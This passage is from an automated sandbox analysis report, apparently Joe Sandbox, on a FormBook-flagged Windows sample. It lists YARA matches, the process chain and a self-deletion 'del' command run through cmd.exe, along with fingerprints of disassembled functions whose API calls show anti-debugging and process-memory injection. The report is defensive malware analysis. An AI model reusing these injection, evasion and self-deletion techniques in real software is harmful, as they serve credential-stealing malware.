00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5452

General

Start time:	12:24:31
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 852 Parent PID: 3388

General

Start time:	12:24:45
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5448 Parent PID: 852

General

Start time:	12:24:50
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
Imagebase:	0x2d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6084 Parent PID: 5448

General

Start time:	12:24:50
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 457b22da_by_Libranalysis.exe PID: 4120 Parent PID: 5652 457b22da_by_Libranalysis.exeCOMMON

Executed Functions

Function 00C904E1, Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

Dv>7, xrefs: 00C906AC
<, xrefs: 00C9060B

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: <$Dv>7
API String ID: 0-1263110731
Opcode ID: f87dee615acd0961bc7c32119bb1f63c768090efee4a8a47f32cc6d6de275adf
Instruction ID: 8f8b21502c8d833f7b546d47be2670d37307a314bea6d9e0c51c3c8024394e46
Opcode Fuzzy Hash: f87dee615acd0961bc7c32119bb1f63c768090efee4a8a47f32cc6d6de275adf
Instruction Fuzzy Hash: A861A775E046188FDB58CFAAC9446DDFBF2BF89304F14C1AAD918AB265EB305A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C91577, Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C916FC

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 455963534dac4b05b6f27ac09936b35724318db0cb90f7049b1c7edd11bb8a9b
Instruction ID: d4a2bbaa8d016d01ed846d2b5cd5d0c2fa32c0f67ab9947b9208d7a908b70b99
Opcode Fuzzy Hash: 455963534dac4b05b6f27ac09936b35724318db0cb90f7049b1c7edd11bb8a9b
Instruction Fuzzy Hash: 44614F75D0E2899FCF02CFB488666EDBFF0AF06318F18849ED4556B252C278D94ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C944A0, Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

(bE, xrefs: 00C9467C

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: (bE
API String ID: 0-693369155
Opcode ID: 0dd04a832f2c503981d85b63f352cd59700dfc9a4811251faf2c1b09776a9852
Instruction ID: 55a9a9001d46814348f1a93b3bfd6576955555421223ada8b47e42aaf7e5418e
Opcode Fuzzy Hash: 0dd04a832f2c503981d85b63f352cd59700dfc9a4811251faf2c1b09776a9852
Instruction Fuzzy Hash: 34F15D7490924ADFCB08CFA5C8969AEFBF2FF45304B25895AC442AB255C338D947CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C94466, Relevance: 1.6, Strings: 1, Instructions: 381COMMON

Download Yara Rule

Strings

(bE, xrefs: 00C9467C

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: (bE
API String ID: 0-693369155
Opcode ID: 0a462b8e0acced9d0e905549800423c74e7925b9cc36aa0cc5246211dc878808
Instruction ID: d24bd051f8fe679d37050a797b0fe266c2c181cb420c9f06bff3d9a71239a6e2
Opcode Fuzzy Hash: 0a462b8e0acced9d0e905549800423c74e7925b9cc36aa0cc5246211dc878808
Instruction Fuzzy Hash: D1F15C74D0824ADFCB18CFA5C8999AEFBB2FF45304B25895AC442AB255D334D943CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C91660, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C916FC

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 889b3ae5ac49dc8946e007ae6389931e703aa28c0d038b7e560b63386d323a7e
Instruction ID: 16076df2436a0f338389e00a57589a8797ec9e18d349afe550149895b851f374
Opcode Fuzzy Hash: 889b3ae5ac49dc8946e007ae6389931e703aa28c0d038b7e560b63386d323a7e
Instruction Fuzzy Hash: FB41BAB5D04259DFCB00CFA9D484AEEFBF4AB09314F14906AE814B7250D738AA89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C94590, Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

(bE, xrefs: 00C9467C

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: (bE
API String ID: 0-693369155
Opcode ID: 74848ae93bdd976c25fcdae3501083fc4a61b1a7ec7e783892c06a58f3f97a28
Instruction ID: 01153097fa6c3f3897f39f84e000f68c89d6faf6ad5f0237007f6084c1e6e0be
Opcode Fuzzy Hash: 74848ae93bdd976c25fcdae3501083fc4a61b1a7ec7e783892c06a58f3f97a28
Instruction Fuzzy Hash: D1D13B74D0420ADFCB08CFD6D4889AEFBB6FF89300B259555D406AB254D334EA82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C9B1A8, Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: cabc99d2a2e247c4aa1f6d0de690a286d3ca5667f7161efda488506bd3ebaeeb
Instruction ID: f8a634aaee8165d0e071f42b0bf7b441f263847e561c732fbea8af9d26b56784
Opcode Fuzzy Hash: cabc99d2a2e247c4aa1f6d0de690a286d3ca5667f7161efda488506bd3ebaeeb
Instruction Fuzzy Hash: E5B12570D15218EFDF18DFA5E984AEDBBB2BF89300F20852AD41AAB254DB349D41DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00C923B4, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93fb9dd97c6636f88c646cc17ddc6b21be92a779eea2906babdd02daf496f81d
Instruction ID: da27e196d8d783051b58a3ccec0bfef90166be308b6a938a7e3512c0946a0445
Opcode Fuzzy Hash: 93fb9dd97c6636f88c646cc17ddc6b21be92a779eea2906babdd02daf496f81d
Instruction Fuzzy Hash: 46B15770E092498FCB08CFB9C8956EEBFF2EF89304F14846AC446AB255D7349946CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C976DA, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71eadd665fb1d200563c818be4acb783bff22882ab738f9838f6e4d9aaf957ac
Instruction ID: 2d1532dedabec4ffea85ca55734f3f4af3d35cfa40e2cbd2db9702c3b6f2403f
Opcode Fuzzy Hash: 71eadd665fb1d200563c818be4acb783bff22882ab738f9838f6e4d9aaf957ac
Instruction Fuzzy Hash: A2815EB1D1A6588FEF19CF6A8C49299FBF3AFD5304F04C1AAC44997225E7304A46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00C92450, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb179855592584cadba5085569538a0f5d26eab15c8ca26cbc09b1417a34d89
Instruction ID: 2c3d979b58dadcf5db8ca85a61faa6ee618d63a2a7b5df5fdccf730724a55a6d
Opcode Fuzzy Hash: 6bb179855592584cadba5085569538a0f5d26eab15c8ca26cbc09b1417a34d89
Instruction Fuzzy Hash: 5291D474E002099FDB08CFEAD9846AEBBB2EF89310F21842AD519BB354D7309945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C92CC9, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c63ee96684452ba051edd41330609f5ad8bfdd3534cefcd0c2477e8e64ab15
Instruction ID: cfb9a862037d95b9bc6aea744df97b34855a9539714bd199dd1462cbfd1baa74
Opcode Fuzzy Hash: 95c63ee96684452ba051edd41330609f5ad8bfdd3534cefcd0c2477e8e64ab15
Instruction Fuzzy Hash: 375127B1E056199FDF08CFA6C9446EEFBF6FF88310F24806AD459A7264D7344A02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 053EAB38, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cedf86688d5b712a406665cd6826e2522f10d91ac4456e2ed23e8237821baa4
Instruction ID: 1756cb5a16cff360913382861c00882905c796364b3e69e88b84b868857d3fa7
Opcode Fuzzy Hash: 8cedf86688d5b712a406665cd6826e2522f10d91ac4456e2ed23e8237821baa4
Instruction Fuzzy Hash: 9F413D70E09229DFCB04CFA5D554AEEFBF6BB89310F18A42AD405F7294D77499418B28

Uniqueness

Uniqueness Score: -1.00%

Function 00C91881, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1854a0cabd2423a9851d112e018de0defd4af5843489e4242282294f9b5339c3
Instruction ID: 962d59fc3dd9cefeba0b1c6b3ec6b0a72a0fa7384db5bcae1475836f54e85f08
Opcode Fuzzy Hash: 1854a0cabd2423a9851d112e018de0defd4af5843489e4242282294f9b5339c3
Instruction Fuzzy Hash: D441F775E046199FDB18CFAAC84569EFBF7BF89300F19C1A6C908AB214D7349A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04BF1FC2, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24fb07e51c6c0d55bc658fc8868e62479b008c0dd502742202c646ab15d40d3
Instruction ID: ffcd4328c81d5834620a984668e16f5f0c6ba5066ada202edda2fd2ad9e7566f
Opcode Fuzzy Hash: a24fb07e51c6c0d55bc658fc8868e62479b008c0dd502742202c646ab15d40d3
Instruction Fuzzy Hash: 84318D71E05208EFDB0CCFB8C58079EFBB2EBC9301F20D4A9850AA3254E735AA45CB14

Uniqueness

Uniqueness Score: -1.00%

Function 04BF1FD0, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22adee359b19e15772b680bd4a14d4269ec699320872d4894d71a10a607260d8
Instruction ID: 5f8c345ad8af368cd758694ac670c4bd3ae393099c857a87d1d187d1277ff846
Opcode Fuzzy Hash: 22adee359b19e15772b680bd4a14d4269ec699320872d4894d71a10a607260d8
Instruction Fuzzy Hash: 1F316D71F05209EFDB0CCFB9C94069EFBB6EBC9301F20D4A9850AA7254E735AA45DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00C96C79, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99165986f04b27a382d43b81fcf59bc998e5a34a91de975eb2b683b5105a53a
Instruction ID: 06c4f40c5f9dc3160a905df96129d5c4c28ec3ecfe06cfeeb6dedac26781e4ab
Opcode Fuzzy Hash: d99165986f04b27a382d43b81fcf59bc998e5a34a91de975eb2b683b5105a53a
Instruction Fuzzy Hash: AD31DB71E056188BEB58CFABD84479EBBB3EFC9300F14C1AAD508A7264DB304A468F51

Uniqueness

Uniqueness Score: -1.00%

Function 00C936B0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671a8f5a96e33b3ccc0c57320b6e4c66ab78d6bd8ddcb542f06d60cd40a51ad4
Instruction ID: 38a9a3c622f718c03be91a387f4f747364238b995ab4289b5c1915b6111af0bd
Opcode Fuzzy Hash: 671a8f5a96e33b3ccc0c57320b6e4c66ab78d6bd8ddcb542f06d60cd40a51ad4
Instruction Fuzzy Hash: 0031F7B1E006588BEB18CFAAD9547DEFBF3AFC9310F14C16AD408A6258DB740A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BF2891, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04BF2900
GetCurrentThread.KERNEL32 ref: 04BF293D
GetCurrentProcess.KERNEL32 ref: 04BF297A
GetCurrentThreadId.KERNEL32 ref: 04BF29D3

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6b77f018757bdbf0df512ff447b806db09d0146a39a90ab447a3785d82f5ab5c
Instruction ID: 4dac60ee41e9e2245696e009cbc44391bdfc4f51bf0e55a45fb32ac83ef54138
Opcode Fuzzy Hash: 6b77f018757bdbf0df512ff447b806db09d0146a39a90ab447a3785d82f5ab5c
Instruction Fuzzy Hash: BC5158B19006498FDB14CFA9D9487DEBBF0FB48314F20809AE159A7390D739A949CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04BF28A0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04BF2900
GetCurrentThread.KERNEL32 ref: 04BF293D
GetCurrentProcess.KERNEL32 ref: 04BF297A
GetCurrentThreadId.KERNEL32 ref: 04BF29D3

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: efb4d39c10ff189eeb0255d7633e6781053b1e055a9df554d67bee43098cd8b1
Instruction ID: 072ab0f993c85561944cec327287abe0a8c34d29235fc504ceb99c6a59e9f274
Opcode Fuzzy Hash: efb4d39c10ff189eeb0255d7633e6781053b1e055a9df554d67bee43098cd8b1
Instruction Fuzzy Hash: BF5157B09006498FDB14CFA9D9487DEBBF0FB48314F2080AAE159A7750D739A948CF66

Uniqueness

Uniqueness Score: -1.00%

Function 053E714D, Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053E741F

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9caf2acd7f1b3a2f9cdd4c51877a74e14bde5ca01430f9652e3548a6bb712de3
Instruction ID: f1368699dc30eca75b312267b3854a45d7944162d1bcb8c87d2fd65fe7a478a8
Opcode Fuzzy Hash: 9caf2acd7f1b3a2f9cdd4c51877a74e14bde5ca01430f9652e3548a6bb712de3
Instruction Fuzzy Hash: 77C13570D042698FDF20CFA4C844BEDBBB2FB49304F0095A9E959B7280DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 053E7158, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053E741F

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 04b48b3dd6978e0cb911f1c3a1bfd18c98b96d7c1cae5ceab18c292449ebadf9
Instruction ID: 059109acf789fd6d7fc8da8831b2575dda0aa7963ed4ecbc1e785c0958365e32
Opcode Fuzzy Hash: 04b48b3dd6978e0cb911f1c3a1bfd18c98b96d7c1cae5ceab18c292449ebadf9
Instruction Fuzzy Hash: 42C12371D042698FDF20CFA4C844BEDBBB2FB49304F0095A9E859B7280DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04BF78E8, Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04BF7B6A

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4c7beec6095342e3e2b79b859b35a2a15d3df6183ac5aaeef98e503506474c2d
Instruction ID: 8ac30f186f15e8cc8e4dc8cf819b2caf3e08830cac36a33a3485feadd99184c0
Opcode Fuzzy Hash: 4c7beec6095342e3e2b79b859b35a2a15d3df6183ac5aaeef98e503506474c2d
Instruction Fuzzy Hash: 1B912770A007059FDB24CF69D48479ABBF1FF48304F0089AAD54AE7A50DB35E94ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 04BF9B0C, Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF9CD9

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f4b667a7d227ba9fa3ec6f388cfb0988bd4491cb7b3765cd0cb0114e9755163a
Instruction ID: 394c4615c1d772d80cd46ea73924c7c89ecab721bcef7ea234171d3eab0cdd21
Opcode Fuzzy Hash: f4b667a7d227ba9fa3ec6f388cfb0988bd4491cb7b3765cd0cb0114e9755163a
Instruction Fuzzy Hash: F4718BB4D04218DFDF20CFA9C984BDDBBF1BB09304F1491AAE958A7211D730AA89CF45

Uniqueness

Uniqueness Score: -1.00%

Function 04BF9B18, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF9CD9

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2f5204206d5b0e182fc7f17c5c36bd275ede38b714c20067be58aad0a23cdd69
Instruction ID: c3f8c5246ce417573779690e52758ab358c3b5fb5041a72cf4edd0e0636eb89b
Opcode Fuzzy Hash: 2f5204206d5b0e182fc7f17c5c36bd275ede38b714c20067be58aad0a23cdd69
Instruction Fuzzy Hash: 38718BB4D04218DFDF20CFA9D984BDDBBF1BB09304F1491AAE958A7211D730AA89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04BFD604, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04BFF771

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 19121edcdef6f4365957d573571f68cbd98b5a3e7e0d21ab84cb9a91ee8c0590
Instruction ID: 56081f5eb562cc3d804452e9c0b048a20b7865759860f9e836ea340e24fed290
Opcode Fuzzy Hash: 19121edcdef6f4365957d573571f68cbd98b5a3e7e0d21ab84cb9a91ee8c0590
Instruction Fuzzy Hash: 4251C671D0422C9FDB20DFA8C844BDEBBB5EF49304F5084AAD509BB251DB716A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04BFF676, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04BFF771

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 779aab9ee10264b886910fd8420401ea1e62bbc85faa08830af0254c6dbe500b
Instruction ID: 2d7ac73e7d858c6fe95ae3abd3d9ec3e4d26f29c2bdfaeeb414bec895cc13a1e
Opcode Fuzzy Hash: 779aab9ee10264b886910fd8420401ea1e62bbc85faa08830af0254c6dbe500b
Instruction Fuzzy Hash: E651D671D04228DFDB20DFA8C944BDEBBB5AF49304F1084AAD509BB251DB716A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 053E6DD0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 053E6EA3

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e7c01bb23a494fc14b35f1ba518a7c4bb8d6512ab8707c23efb787c201257118
Instruction ID: b175a7fd2e88a17fedf82f577dedf1269ae3722f7914fe9e4fb14014f2a2b59b
Opcode Fuzzy Hash: e7c01bb23a494fc14b35f1ba518a7c4bb8d6512ab8707c23efb787c201257118
Instruction Fuzzy Hash: F541A7B4D052589FCF00CFA9D984AEEFBF1BB49314F14902AE819BB240D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 053E6DCF, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 053E6EA3

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 43126d5f59c0c7927ae7a7cc7c241dcf5cbc0718ae825264817937c3f4e23afd
Instruction ID: eefa56381f0a12feef911c40032e614b5929ebbab3ec590b3695c181acb49c87
Opcode Fuzzy Hash: 43126d5f59c0c7927ae7a7cc7c241dcf5cbc0718ae825264817937c3f4e23afd
Instruction Fuzzy Hash: 1941A7B4D052589FCF10CFA9D984AEEFBF1BB49314F14902AE819BB240D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BF2AC0, Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04BF2B93

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0b7b74bfb7d689d3c6d3e9fad876f074057eb2e7c5b2d4829270d1ab61cdfe4c
Instruction ID: 159acdb1fa1e07bac54d71437e5923322a3796a88a649ca1ef11bf1b12f3a676
Opcode Fuzzy Hash: 0b7b74bfb7d689d3c6d3e9fad876f074057eb2e7c5b2d4829270d1ab61cdfe4c
Instruction Fuzzy Hash: AC4165B9D042589FCF00CFA9D984ADEBBF5BB09310F14906AE918BB311D335AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 053E6F21, Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 053E6FDA

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 66fb331940f36bb6e1c85ced23cc8b181fd86487bc967b2c4287235aeab32030
Instruction ID: 9f9033340e00d2e1fba27461d0402d8dcd28fc303a4546651337730ad71e387e
Opcode Fuzzy Hash: 66fb331940f36bb6e1c85ced23cc8b181fd86487bc967b2c4287235aeab32030
Instruction Fuzzy Hash: 7941B9B5D04258DFCF00CFA9D884AEEFBB5BB49310F14942AE815B7240D735A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BF2AC8, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04BF2B93

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2a153e8c5c275c4e91629f6942841ae2711a4a6d5adc57024dfd0a65f6f33716
Instruction ID: 6c28f95798921eb5d05e708d0c6d0e5570ba1d63e2c76c6d5ba88a521ce60605
Opcode Fuzzy Hash: 2a153e8c5c275c4e91629f6942841ae2711a4a6d5adc57024dfd0a65f6f33716
Instruction Fuzzy Hash: F24165B9D042589FCF00CFA9D984ADEBBF5BB09310F14906AE918BB310D335A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 053E6F28, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 053E6FDA

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
